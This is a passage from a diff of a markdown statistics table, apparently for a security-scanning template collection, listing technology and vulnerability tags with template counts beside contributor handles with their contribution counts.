| | | | +| printer | 5 | random-robbie | 2 | | | | | | | +| ssti | 5 | kiblyn11 | 2 | | | | | | | | thinkphp | 5 | dahse89 | 2 | | | | | | | -| circarlife | 5 | socketz | 2 | | | | | | | -| printer | 5 | w4cky_ | 2 | | | | | | | -| crlf | 5 | manas_harsh | 2 | | | | | | | -| ssti | 5 | huowuzhao | 2 | | | | | | | -| dedecms | 5 | alph4byt3 | 2 | | | | | | | -| headless | 5 | koti2 | 2 | | | | | | | -| tomcat | 5 | x1m_martijn | 2 | | | | | | | -| iis | 5 | 0xsapra | 2 | | | | | | | -| jolokia | 5 | cocxanh | 2 | | | | | | | -| windows | 5 | 0xsmiley | 2 | | | | | | | -| symfony | 5 | g4l1t0 | 2 | | | | | | | -| wso2 | 5 | bsysop | 2 | | | | | | | -| java | 5 | dheerajmadhukar | 2 | | | | | | | -| git | 4 | swissky | 2 | | | | | | | -| grafana | 4 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| rfi | 4 | gal nagli | 2 | | | | | | | -| slack | 4 | parth | 2 | | | | | | | -| buffalo | 4 | its0x08 | 2 | | | | | | | -| artifactory | 4 | sy3omda | 2 | | | | | | | -| magmi | 4 | zomsop82 | 2 | | | | | | | -| zimbra | 4 | bp0lr | 2 | | | | | | | -| strapi | 4 | martincodes-de | 2 | | | | | | | -| zabbix | 4 | randomrobbie | 2 | | | | | | | -| traversal | 4 | r3naissance | 2 | | | | | | | -| moodle | 4 | ehsahil | 2 | | | | | | | -| fatpipe | 4 | whoever | 2 | | | | | | | -| resin | 4 | amsda | 2 | | | | | | | -| thinkcmf | 4 | cristi vlad (@cristivlad25) | 2 | | | | | | | -| microstrategy | 4 | foulenzer | 2 | | | | | | | -| exchange | 4 | 0xelkomy | 2 | | | | | | | -| proxy | 4 | joeldeleep | 2 | | | | | | | -| elastic | 4 | random-robbie | 2 | | | | | | | -| enum | 4 | ree4pwn | 2 | | | | | | | -| maps | 4 | 0xcrypto | 2 | | | | | | | -| keycloak | 4 | 0xrudra | 2 | | | | | | | -| symantec | 4 | ratnadip gajbhiye | 1 | | | | | | | -| samsung | 4 | 0xrod | 1 | | | | | | | -| glpi | 4 | harshinsecurity | 1 | | | | | | | -| firmware | 4 | droberson | 1 | | | | | | | -| amazon | 4 | vzamanillo | 1 | | | | | | | -| bigip | 4 | mass0ma | 1 | | | | | | | -| asp | 4 | ipanda | 1 | | | | | | | -| vpn | 4 | kishore krishna (sillydaddy) | 1 | | | | | | | -| hongdian | 4 | brabbit10 | 1 | | | | | | | -| solarwinds | 4 | naglinagli | 1 | | | | | | | -| npm | 4 | borna nematzadeh | 1 | | | | | | | -| firebase | 4 | yavolo | 1 | | | | | | | -| webserver | 4 | nerrorsec | 1 | | | | | | | -| sonicwall | 3 | juicypotato1 | 1 | | | | | | | -| itop | 3 | zhenwarx | 1 | | | | | | | -| nosqli | 3 | petruknisme | 1 | | | | | | | -| backdoor | 3 | hanlaomo | 1 | | | | | | | -| cloud | 3 | cookiehanhoan | 1 | | | | | | | -| search | 3 | akshansh | 1 | | | | | | | -| tikiwiki | 3 | bjhulst | 1 | | | | | | | -| cacti | 3 | rojanrijal | 1 | | | | | | | -| jeesns | 3 | rodnt | 1 | | | | | | | -| druid | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | -| kafka | 3 | thebinitghimire | 1 | | | | | | | -| openssh | 3 | infosecsanyam | 1 | | | | | | | -| oa | 3 | xstp | 1 | | | | | | | -| mongodb | 3 | chron0x | 1 | | | | | | | -| minio | 3 | fopina | 1 | | | | | | | -| cve2007 | 3 | _0xf4n9x_ | 1 | | | | | | | -| sql | 3 | thezakman | 1 | | | | | | | -| terramaster | 3 | adrianmf | 1 | | | | | | | -| hoteldruid | 3 | x6263 | 1 | | | | | | | -| opensis | 3 | s1r1u5_ | 1 | | | | | | | -| httpd | 3 | affix | 1 | | | | | | | -| node | 3 | whynotke | 1 | | | | | | | -| github | 3 | mesaglio | 1 | | | | | | | -| nexus | 3 | rotemreiss | 1 | | | | | | | -| azure | 3 | elmahdi | 1 | | | | | | | -| fpd | 3 | omarkurt | 1 | | | | | | | -| exposures | 3 | florianmaak | 1 | | | | | | | -| linkerd | 3 | daviey | 1 | | | | | | | -| caucho | 3 | toufik airane | 1 | | | | | | | -| zhiyuan | 3 | ahmed sherif | 1 | | | | | | | -| openam | 3 | andirrahmani1 | 1 | | | | | | | -| fanruan | 3 | philippdelteil | 1 | | | | | | | -| ssh | 3 | lethargynavigator | 1 | | | | | | | -| ebs | 3 | push4d | 1 | | | | | | | -| kibana | 3 | tim_koopmans | 1 | | | | | | | -| lansweeper | 3 | mah3sec_ | 1 | | | | | | | -| lfr | 3 | schniggie | 1 | | | | | | | -| injection | 3 | mubassirpatel | 1 | | | | | | | -| mail | 3 | b0rn2r00t | 1 | | | | | | | -| movable | 3 | blckraven | 1 | | | | | | | -| ofbiz | 3 | pratik khalane | 1 | | | | | | | -| smtp | 3 | @dwisiswant0 | 1 | | | | | | | -| r-seenet | 3 | akash.c | 1 | | | | | | | -| springcloud | 3 | bolli95 | 1 | | | | | | | -| telerik | 3 | nytr0gen | 1 | | | | | | | -| vbulletin | 3 | b4uh0lz | 1 | | | | | | | -| nacos | 3 | th3.d1p4k | 1 | | | | | | | -| cves | 3 | evolutionsec | 1 | | | | | | | -| targa | 3 | ilovebinbash | 1 | | | | | | | -| kevinlab | 3 | streetofhackerr007 | 1 | | | | | | | -| log | 3 | ringo | 1 | | | | | | | -| jellyfin | 3 | _c0wb0y_ | 1 | | | | | | | -| bitrix | 3 | becivells | 1 | | | | | | | -| natshell | 2 | kre80r | 1 | | | | | | | -| dolibarr | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| waf | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| qcubed | 2 | sickwell | 1 | | | | | | | -| horde | 2 | qlkwej | 1 | | | | | | | -| yii | 2 | shreyapohekar | 1 | | | | | | | -| getsimple | 2 | j3ssie/geraldino2 | 1 | | | | | | | -| openemr | 2 | orpheus | 1 | | | | | | | -| sonarqube | 2 | sec_hawk | 1 | | | | | | | -| kong | 2 | luci | 1 | | | | | | | -| geowebserver | 2 | manuelbua | 1 | | | | | | | -| adminer | 2 | un-fmunozs | 1 | | | | | | | -| maian | 2 | smaranchand | 1 | | | | | | | -| dos | 2 | kabirsuda | 1 | | | | | | | -| cve2005 | 2 | 0h1in9e | 1 | | | | | | | -| jeedom | 2 | husain | 1 | | | | | | | -| oauth | 2 | zandros0 | 1 | | | | | | | -| globalprotect | 2 | charanrayudu | 1 | | | | | | | -| idea | 2 | sicksec | 1 | | | | | | | -| bucket | 2 | mhdsamx | 1 | | | | | | | -| huawei | 2 | makyotox | 1 | | | | | | | -| backups | 2 | udyz | 1 | | | | | | | -| trixbox | 2 | andysvints | 1 | | | | | | | -| hashicorp | 2 | jeya seelan | 1 | | | | | | | -| glassfish | 2 | exploitation | 1 | | | | | | | -| flir | 2 | alex | 1 | | | | | | | -| ucmdb | 2 | flag007 | 1 | | | | | | | -| sharepoint | 2 | retr02332 | 1 | | | | | | | -| text | 2 | remonsec | 1 | | | | | | | -| netis | 2 | berkdusunur | 1 | | | | | | | -| totemomail | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| rocketchat | 2 | co0nan | 1 | | | | | | | -| commax | 2 | ooooooo_q | 1 | | | | | | | -| paloalto | 2 | majidmc2 | 1 | | | | | | | -| qihang | 2 | izn0u | 1 | | | | | | | -| storage | 2 | tirtha_mandal | 1 | | | | | | | -| rstudio | 2 | iampritam | 1 | | | | | | | -| rockmongo | 2 | @ofjaaah | 1 | | | | | | | -| idrac | 2 | dawid-czarnecki | 1 | | | | | | | -| status | 2 | soyelmago | 1 | | | | | | | -| linux | 2 | 0xtavian | 1 | | | | | | | -| frp | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| mailchimp | 2 | elder tao | 1 | | | | | | | -| embed | 2 | micha3lb3n | 1 | | | | | | | -| aruba | 2 | sshell | 1 | | | | | | | -| netsweeper | 2 | aresx | 1 | | | | | | | -| s3 | 2 | fmunozs | 1 | | | | | | | -| zeroshell | 2 | pudsec | 1 | | | | | | | -| kentico | 2 | intx0x80 | 1 | | | | | | | -| jsf | 2 | yashanand155 | 1 | | | | | | | -| ecology | 2 | absshax | 1 | | | | | | | -| fortios | 2 | jteles | 1 | | | | | | | -| igs | 2 | alperenkesk | 1 | | | | | | | -| phpcollab | 2 | kaizensecurity | 1 | | | | | | | -| cache | 2 | defr0ggy | 1 | | | | | | | -| odoo | 2 | _harleo | 1 | | | | | | | -| electron | 2 | kba@sogeti_esec | 1 | | | | | | | -| nextjs | 2 | retr0 | 1 | | | | | | | -| service | 2 | 0xteles | 1 | | | | | | | -| bypass | 2 | elouhi | 1 | | | | | | | -| middleware | 2 | notsoevilweasel | 1 | | | | | | | -| harbor | 2 | deena | 1 | | | | | | | -| rancher | 2 | ajaysenr | 1 | | | | | | | -| hikvision | 2 | sbani | 1 | | | | | | | -| smb | 2 | clarkvoss | 1 | | | | | | | -| chamilo | 2 | oscarintherocks | 1 | | | | | | | -| payara | 2 | wabafet | 1 | | | | | | | -| saltstack | 2 | thevillagehacker | 1 | | | | | | | -| axis2 | 2 | kurohost | 1 | | | | | | | -| avantfax | 2 | b0yd | 1 | | | | | | | -| nextcloud | 2 | taielab | 1 | | | | | | | -| plesk | 2 | hakluke | 1 | | | | | | | -| liferay | 2 | patralos | 1 | | | | | | | -| vcenter | 2 | furkansenan | 1 | | | | | | | -| wuzhicms | 2 | geraldino2 | 1 | | | | | | | -| guacamole | 2 | yashgoti | 1 | | | | | | | -| spring | 2 | @github.com/defr0ggy | 1 | | | | | | | -| ruby | 2 | 0xh7ml | 1 | | | | | | | -| db | 2 | _darrenmartyn | 1 | | | | | | | -| fortinet | 2 | bad5ect0r | 1 | | | | | | | -| aviatrix | 2 | bernardo rodrigues | 1 | | | | | | | +| tomcat | 5 | huowuzhao | 2 | | | | | | | +| headless | 5 | martincodes-de | 2 | | | | | | | +| crlf | 5 | cristi vlad (@cristivlad25) | 2 | | | | | | | +| maps | 4 | ehsahil | 2 | | | | | | | +| fatpipe | 4 | swissky | 2 | | | | | | | +| git | 4 | ree4pwn | 2 | | | | | | | +| resin | 4 | manas_harsh | 2 | | | | | | | +| amazon | 4 | pxmme1337 | 2 | | | | | | | +| artifactory | 4 | udit_thakkur | 2 | | | | | | | +| rfi | 4 | w4cky_ | 2 | | | | | | | +| zabbix | 4 | zomsop82 | 2 | | | | | | | +| vpn | 4 | 0xelkomy | 2 | | | | | | | +| strapi | 4 | 0xprial | 2 | | | | | | | +| grafana | 4 | fabaff | 2 | | | | | | | +| bigip | 4 | bp0lr | 2 | | | | | | | +| symantec | 4 | davidmckennirey | 2 | | | | | | | +| npm | 4 | randomrobbie | 2 | | | | | | | +| zimbra | 4 | bsysop | 2 | | | | | | | +| firebase | 4 | cocxanh | 2 | | | | | | | +| traversal | 4 | x1m_martijn | 2 | | | | | | | +| magmi | 4 | nkxxkn | 2 | | | | | | | +| enum | 4 | mohammedsaneem | 2 | | | | | | | +| asp | 4 | r3naissance | 2 | | | | | | | +| hongdian | 4 | moritz nentwig | 2 | | | | | | | +| buffalo | 4 | vavkamil | 2 | | | | | | | +| wcs | 4 | willd96 | 1 | | | | | | | +| exchange | 4 | akshansh | 1 | | | | | | | +| solarwinds | 4 | yuansec | 1 | | | | | | | +| firmware | 4 | b0rn2r00t | 1 | | | | | | | +| microstrategy | 4 | push4d | 1 | | | | | | | +| moodle | 4 | nerrorsec | 1 | | | | | | | +| webserver | 4 | mah3sec_ | 1 | | | | | | | +| keycloak | 4 | s1r1u5_ | 1 | | | | | | | +| elastic | 4 | exploitation | 1 | | | | | | | +| proxy | 4 | taielab | 1 | | | | | | | +| glpi | 4 | b0yd | 1 | | | | | | | +| slack | 4 | ldionmarcil | 1 | | | | | | | +| thinkcmf | 4 | luskabol | 1 | | | | | | | +| samsung | 4 | infosecsanyam | 1 | | | | | | | +| ebs | 3 | 0xteles | 1 | | | | | | | +| azure | 3 | 0h1in9e | 1 | | | | | | | +| openam | 3 | _c0wb0y_ | 1 | | | | | | | +| kafka | 3 | tirtha_mandal | 1 | | | | | | | +| nosqli | 3 | absshax | 1 | | | | | | | +| movable | 3 | deena | 1 | | | | | | | +| httpd | 3 | ajaysenr | 1 | | | | | | | +| tikiwiki | 3 | kre80r | 1 | | | | | | | +| sql | 3 | ratnadip gajbhiye | 1 | | | | | | | +| minio | 3 | iampritam | 1 | | | | | | | +| oa | 3 | b4uh0lz | 1 | | | | | | | +| cves | 3 | rodnt | 1 | | | | | | | +| telerik | 3 | regala_ | 1 | | | | | | | +| cve2007 | 3 | kurohost | 1 | | | | | | | +| jeesns | 3 | harshinsecurity | 1 | | | | | | | +| opensis | 3 | intx0x80 | 1 | | | | | | | +| ofbiz | 3 | kabirsuda | 1 | | | | | | | +| node | 3 | sec_hawk | 1 | | | | | | | +| log | 3 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| exposures | 3 | kba@sogeti_esec | 1 | | | | | | | +| kibana | 3 | bolli95 | 1 | | | | | | | +| terramaster | 3 | twitter.com/dheerajmadhukar | 1 | | | | | | | +| targa | 3 | chron0x | 1 | | | | | | | +| linkerd | 3 | clarkvoss | 1 | | | | | | | +| bitrix | 3 | akash.c | 1 | | | | | | | +| fpd | 3 | nvn1729 | 1 | | | | | | | +| backdoor | 3 | pdp | 1 | | | | | | | +| cacti | 3 | jeya seelan | 1 | | | | | | | +| vbulletin | 3 | andirrahmani1 | 1 | | | | | | | +| sonicwall | 3 | mesaglio | 1 | | | | | | | +| springcloud | 3 | aceseven (digisec360) | 1 | | | | | | | +| druid | 3 | rotemreiss | 1 | | | | | | | +| jellyfin | 3 | un-fmunozs | 1 | | | | | | | +| hoteldruid | 3 | kaizensecurity | 1 | | | | | | | +| injection | 3 | x6263 | 1 | | | | | | | +| r-seenet | 3 | berkdusunur | 1 | | | | | | | +| nacos | 3 | ooooooo_q | 1 | | | | | | | +| mongodb | 3 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| jboss | 2 | 0xd0ff9 | 1 | | | | | | | -| leak | 2 | aceseven (digisec360) | 1 | | | | | | | -| chyrp | 2 | ahmetpergamum | 1 | | | | | | | -| akkadian | 2 | kareemse1im | 1 | | | | | | | -| prestashop | 2 | willd96 | 1 | | | | | | | -| spark | 2 | gboddin | 1 | | | | | | | -| hpe | 2 | ohlinge | 1 | | | | | | | -| bruteforce | 2 | c3l3si4n | 1 | | | | | | | -| akamai | 2 | igibanez | 1 | | | | | | | -| hjtcloud | 2 | 52971 | 1 | | | | | | | -| showdoc | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| aspose | 2 | ldionmarcil | 1 | | | | | | | -| wordfence | 2 | 0ut0fb4nd | 1 | | | | | | | -| seeyon | 2 | d0rkerdevil | 1 | | | | | | | -| axis | 2 | undefl0w | 1 | | | | | | | -| pega | 2 | noamrathaus | 1 | | | | | | | -| grav | 2 | regala_ | 1 | | | | | | | -| mida | 2 | pdp | 1 | | | | | | | -| favicon | 2 | apt-mirror | 1 | | | | | | | -| lotus | 2 | luskabol | 1 | | | | | | | -| myfactory | 2 | j33n1k4 | 1 | | | | | | | -| forcepoint | 2 | raesene | 1 | | | | | | | -| ecoa | 2 | revblock | 1 | | | | | | | -| jetbrains | 2 | jrolf | 1 | | | | | | | -| linkedin | 2 | jiheon-dev | 1 | | | | | | | -| openvpn | 2 | shifacyclewla | 1 | | | | | | | -| couchdb | 2 | lark lab | 1 | | | | | | | -| emerge | 2 | knassar702 | 1 | | | | | | | -| icewarp | 2 | nvn1729 | 1 | | | | | | | -| hasura | 2 | shelld3v | 1 | | | | | | | -| xxljob | 2 | | | | | | | | | -| nagios | 2 | | | | | | | | | -| shellshock | 2 | | | | | | | | | -| mcafee | 2 | | | | | | | | | -| yapi | 2 | | | | | | | | | -| ilo | 2 | | | | | | | | | -| phpstorm | 2 | | | | | | | | | -| upload | 2 | | | | | | | | | -| activemq | 2 | | | | | | | | | -| openfire | 2 | | | | | | | | | -| bitly | 2 | | | | | | | | | +| lansweeper | 3 | thevillagehacker | 1 | | | | | | | +| caucho | 3 | _darrenmartyn | 1 | | | | | | | +| lfr | 3 | yavolo | 1 | | | | | | | +| nexus | 3 | imnightmaree | 1 | | | | | | | +| github | 3 | florianmaak | 1 | | | | | | | +| kevinlab | 3 | shelld3v | 1 | | | | | | | +| openssh | 3 | makyotox | 1 | | | | | | | +| search | 3 | dawid-czarnecki | 1 | | | | | | | +| fanruan | 3 | d0rkerdevil | 1 | | | | | | | +| cloud | 3 | daviey | 1 | | | | | | | +| smtp | 3 | mhdsamx | 1 | | | | | | | +| mail | 3 | lethargynavigator | 1 | | | | | | | +| zhiyuan | 3 | knassar702 | 1 | | | | | | | +| itop | 3 | micha3lb3n | 1 | | | | | | | +| ssh | 3 | @github.com/defr0ggy | 1 | | | | | | | +| prestashop | 2 | wabafet | 1 | | | | | | | +| jetbrains | 2 | elmahdi | 1 | | | | | | | +| redis | 2 | oscarintherocks | 1 | | | | | | | +| aviatrix | 2 | zhenwarx | 1 | | | | | | | +| service | 2 | manuelbua | 1 | | | | | | | +| chyrp | 2 | apt-mirror | 1 | | | | | | | +| rancher | 2 | whynotke | 1 | | | | | | | +| embed | 2 | flag007 | 1 | | | | | | | +| justwriting | 2 | borna nematzadeh | 1 | | | | | | | +| favicon | 2 | naglinagli | 1 | | | | | | | +| geowebserver | 2 | ringo | 1 | | | | | | | +| huawei | 2 | nytr0gen | 1 | | | | | | | +| pega | 2 | 0xh7ml | 1 | | | | | | | +| hashicorp | 2 | smaranchand | 1 | | | | | | | +| dos | 2 | charanrayudu | 1 | | | | | | | +| ilo | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| spark | 2 | hanlaomo | 1 | | | | | | | +| nagios | 2 | toufik airane | 1 | | | | | | | +| wordfence | 2 | bad5ect0r | 1 | | | | | | | +| bypass | 2 | udyz | 1 | | | | | | | +| phpcollab | 2 | remonsec | 1 | | | | | | | +| idrac | 2 | 52971 | 1 | | | | | | | +| icewarp | 2 | ipanda | 1 | | | | | | | +| cache | 2 | bjhulst | 1 | | | | | | | +| sharepoint | 2 | 0xd0ff9 | 1 | | | | | | | +| bucket | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| spring | 2 | hakluke | 1 | | | | | | | +| myfactory | 2 | igibanez | 1 | | | | | | | +| ecology | 2 | 0xtavian | 1 | | | | | | | +| kentico | 2 | defr0ggy | 1 | | | | | | | +| status | 2 | pudsec | 1 | | | | | | | +| prtg | 2 | orpheus | 1 | | | | | | | +| chiyu | 2 | izn0u | 1 | | | | | | | +| paloalto | 2 | omarkurt | 1 | | | | | | | +| fortios | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| axis2 | 2 | geraldino2 | 1 | | | | | | | +| totemomail | 2 | 0ut0fb4nd | 1 | | | | | | | +| wuzhicms | 2 | yashanand155 | 1 | | | | | | | +| vcenter | 2 | jiheon-dev | 1 | | | | | | | +| mcafee | 2 | retr0 | 1 | | | | | | | +| heroku | 2 | mubassirpatel | 1 | | | | | | | +| oauth | 2 | undefl0w | 1 | | | | | | | +| horde | 2 | fopina | 1 | | | | | | | +| smb | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| nextjs | 2 | mass0ma | 1 | | | | | | | +| hostheader-injection | 2 | _harleo | 1 | | | | | | | +| chamilo | 2 | @dwisiswant0 | 1 | | | | | | | +| qihang | 2 | jteles | 1 | | | | | | | +| maian | 2 | qlkwej | 1 | | | | | | | +| ucmdb | 2 | adrianmf | 1 | | | | | | | +| storage | 2 | lark lab | 1 | | | | | | | +| grav | 2 | zandros0 | 1 | | | | | | | +| natshell | 2 | j33n1k4 | 1 | | | | | | | +| axis | 2 | ohlinge | 1 | | | | | | | +| python | 2 | juicypotato1 | 1 | | | | | | | +| aruba | 2 | soyelmago | 1 | | | | | | | +| netsweeper | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| | | security | | | | | | | | +| yii | 2 | rojanrijal | 1 | | | | | | | +| bitly | 2 | blckraven | 1 | | | | | | | +| hikvision | 2 | petruknisme | 1 | | | | | | | +| adminer | 2 | brabbit10 | 1 | | | | | | | +| vrealize | 2 | patralos | 1 | | | | | | | +| text | 2 | schniggie | 1 | | | | | | | +| payara | 2 | retr02332 | 1 | | | | | | | +| yapi | 2 | sicksec | 1 | | | | | | | +| emerge | 2 | husain | 1 | | | | | | | +| avantfax | 2 | droberson | 1 | | | | | | | +| idea | 2 | gboddin | 1 | | | | | | | +| showdoc | 2 | yashgoti | 1 | | | | | | | +| xxljob | 2 | xstp | 1 | | | | | | | +| igs | 2 | alex | 1 | | | | | | | +| ec2 | 2 | ahmetpergamum | 1 | | | | | | | +| mailchimp | 2 | th3.d1p4k | 1 | | | | | | | +| shellshock | 2 | 0xrod | 1 | | | | | | | +| globalprotect | 2 | elouhi | 1 | | | | | | | +| openemr | 2 | raesene | 1 | | | | | | | +| activemq | 2 | ilovebinbash | 1 | | | | | | | +| db | 2 | j3ssie/geraldino2 | 1 | | | | | | | +| akkadian | 2 | sbani | 1 | | | | | | | +| openvpn | 2 | noamrathaus | 1 | | | | | | | +| plesk | 2 | jrolf | 1 | | | | | | | +| splunk | 2 | affix | 1 | | | | | | | +| trixbox | 2 | evolutionsec | 1 | | | | | | | +| rockmongo | 2 | alperenkesk | 1 | | | | | | | +| webcam | 2 | aresx | 1 | | | | | | | +| waf | 2 | cookiehanhoan | 1 | | | | | | | +| cve2005 | 2 | becivells | 1 | | | | | | | +| phpstorm | 2 | revblock | 1 | | | | | | | +| couchdb | 2 | philippdelteil | 1 | | | | | | | +| s3 | 2 | kareemse1im | 1 | | | | | | | +| glassfish | 2 | fmunozs | 1 | | | | | | | +| mida | 2 | ahmed sherif | 1 | | | | | | | +| liferay | 2 | majidmc2 | 1 | | | | | | | +| hasura | 2 | thebinitghimire | 1 | | | | | | | +| commax | 2 | pratik khalane | 1 | | | | | | | +| tidb | 2 | luci | 1 | | | | | | | +| odoo | 2 | sickwell | 1 | | | | | | | +| ruby | 2 | streetofhackerr007 | 1 | | | | | | | +| rocketchat | 2 | shifacyclewla | 1 | | | | | | | +| getsimple | 2 | tim_koopmans | 1 | | | | | | | +| linkedin | 2 | notsoevilweasel | 1 | | | | | | | +| dolibarr | 2 | @ofjaaah | 1 | | | | | | | +| akamai | 2 | co0nan | 1 | | | | | | | +| qcubed | 2 | c3l3si4n | 1 | | | | | | | +| backups | 2 | andysvints | 1 | | | | | | | +| seeyon | 2 | elder tao | 1 | | | | | | | +| voipmonitor | 2 | sshell | 1 | | | | | | | +| openfire | 2 | furkansenan | 1 | | | | | | | +| flir | 2 | vzamanillo | 1 | | | | | | | +| jeedom | 2 | thezakman | 1 | | | | | | | +| upload | 2 | shreyapohekar | 1 | | | | | | | +| hjtcloud | 2 | | | | | | | | | +| guacamole | 2 | | | | | | | | | +| nextcloud | 2 | | | | | | | | | +| netis | 2 | | | | | | | | | +| electron | 2 | | | | | | | | | +| lotus | 2 | | | | | | | | | +| saltstack | 2 | | | | | | | | | +| leak | 2 | | | | | | | | | +| rstudio | 2 | | | | | | | | | +| bruteforce | 2 | | | | | | | | | +| frp | 2 | | | | | | | | | +| jsf | 2 | | | | | | | | | +| harbor | 2 | | | | | | | | | +| jboss | 2 | | | | | | | | | +| forcepoint | 2 | | | | | | | | | +| middleware | 2 | | | | | | | | | +| linux | 2 | | | | | | | | | +| kong | 2 | | | | | | | | | +| ecoa | 2 | | | | | | | | | +| sonarqube | 2 | | | | | | | | | +| hpe | 2 | | | | | | | | | +| zeroshell | 2 | | | | | | | | | +| fortinet | 2 | | | | | | | | | | places | 2 | | | | | | | | | -| chiyu | 2 | | | | | | | | | -| ec2 | 2 | | | | | | | | | -| voipmonitor | 2 | | | | | | | | | -| heroku | 2 | | | | | | | | | -| vrealize | 2 | | | | | | | | | -| prtg | 2 | | | | | | | | | -| python | 2 | | | | | | | | | -| tidb | 2 | | | | | | | | | -| hostheader-injection | 2 | | | | | | | | | -| splunk | 2 | | | | | | | | | -| justwriting | 2 | | | | | | | | | -| webcam | 2 | | | | | | | | | -| redis | 2 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| jaspersoft | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| cooperhewitt | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| distance | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| actuator | 1 | | | | | | | | | -| sendgrid | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| weglot | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| webex | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| spotify | 1 | | | | | | | | | -| buildkite | 1 | | | | | | | | | -| tor | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| skycaiji | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| olivetti | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| okiko | 1 | | | | | | | | | -| shoppable | 1 | | | | | | | | | -| dribbble | 1 | | | | | | | | | -| vercel | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| bingmaps | 1 | | | | | | | | | -| gstorage | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| graylog | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| tinymce | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| particle | 1 | | | | | | | | | -| artica | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| binance | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| dbt | 1 | | | | | | | | | -| loqate | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| fcm | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| gitea | 1 | | | | | | | | | -| stripe | 1 | | | | | | | | | -| postmark | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| pcoip | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| gunicorn | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| billquick | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | +| aspose | 2 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | | graph | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| listserv | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| thecatapi | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| weather | 1 | | | | | | | | | -| adiscon | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| urlscan | 1 | | | | | | | | | -| asana | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| loganalyzer | 1 | | | | | | | | | -| elasticsearch | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| metabase | 1 | | | | | | | | | -| graphql | 1 | | | | | | | | | -| xmpp | 1 | | | | | | | | | -| phpwiki | 1 | | | | | | | | | -| piluscart | 1 | | | | | | | | | -| omi | 1 | | | | | | | | | -| redmine | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| mkdocs | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| clickhouse | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| exponentcms | 1 